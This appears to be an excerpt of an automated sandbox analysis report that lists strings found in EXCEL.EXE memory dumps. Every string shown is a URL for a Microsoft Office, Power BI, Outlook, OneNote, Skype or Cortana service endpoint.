    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/beta/myorg/imports?U
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets3h
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://apis.live.net/v5.0/Url
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/OneNoteBulletinshttps://
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://augloop.office.com
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://augloop.office.com/v2
    Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2Bearer
    Source: EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2https://login.windows.net/common/oauth2/authorize
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2i
    Source: EXCEL.EXE, 00000001.00000003.599068019.0000000012B5F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291939744.0000000012B5F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601504361.0000000012B5C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564335933.0000000012B5F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738776475.0000000012B5E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660234147.0000000012B5D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289261489.0000000012B5F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620615824.0000000012B5D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754863288.0000000012B5E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623614960.0000000012B5D000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.come
    Source: EXCEL.EXE, 00000001.00000002.751574667.000000000D65E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289495071.0000000012AA6000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmld2db8
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://cdn.entity.
    Source: EXCEL.EXE, 00000001.00000003.604153523.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622581671.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565377395.000000000F2FA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619496038.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618391633.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.753326969.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599684580.000000000F2F9000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://clients.config.office.net/
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/H
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/O&
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policiesRm
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/ios(U
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/macw/
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: EXCEL.EXE, 00000001.00000003.604153523.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622581671.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565377395.000000000F2FA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619496038.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618391633.000000000F2EF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.753326969.000000000F2F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599684580.000000000F2F9000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey(
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/z&
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspxOneNoteCloudFilesConsumerEmbedhttps://onedrive.live.com/em
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspxQj
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://config.edge.skype.com
    Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://config.edge.skype.com/config/v2/OfficeKk
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://cortana.ai
    Source: 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drString found in binary or memory: https://cortana.ai/api
    Source: EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aietl
